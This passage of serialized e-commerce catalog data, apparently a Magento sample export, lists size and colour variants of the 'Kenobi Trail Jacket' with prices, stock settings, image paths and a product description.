"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"245\":{\"sku\":\"MJ04-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-S-Purple\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"246\":{\"sku\":\"MJ04-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-M-Black\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"247\":{\"sku\":\"MJ04-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-M-Blue\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"248\":{\"sku\":\"MJ04-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-M-Purple\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"249\":{\"sku\":\"MJ04-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-L-Black\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"250\":{\"sku\":\"MJ04-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-L-Blue\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"251\":{\"sku\":\"MJ04-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-L-Purple\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"252\":{\"sku\":\"MJ04-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-XL-Black\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"47\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kenobi-trail-jacket-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj04-black_alt1.jpg,\\/m\\/j\\/mj04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"253\":{\"sku\":\"MJ04-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Kenobi Trail Jacket-XL-Blue\",\"description\":\"<p>Aside from sealed seams to keep moisture out and body heat in, the Kenobi Trail Vest is all about media convenience. Use your phone and music player without ever taking it out of its cozy compartment: an attached remote on the left chest lets you change songs, pause and raise\\/lower volume.<\\/p>\\n<p>&bull; Black 1\\/4 zip pullover with royal zipper. <br \\/>&bull; Adjustable hood and sleeve cuffs. <br \\/>&bull; Machine wash\\/air dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 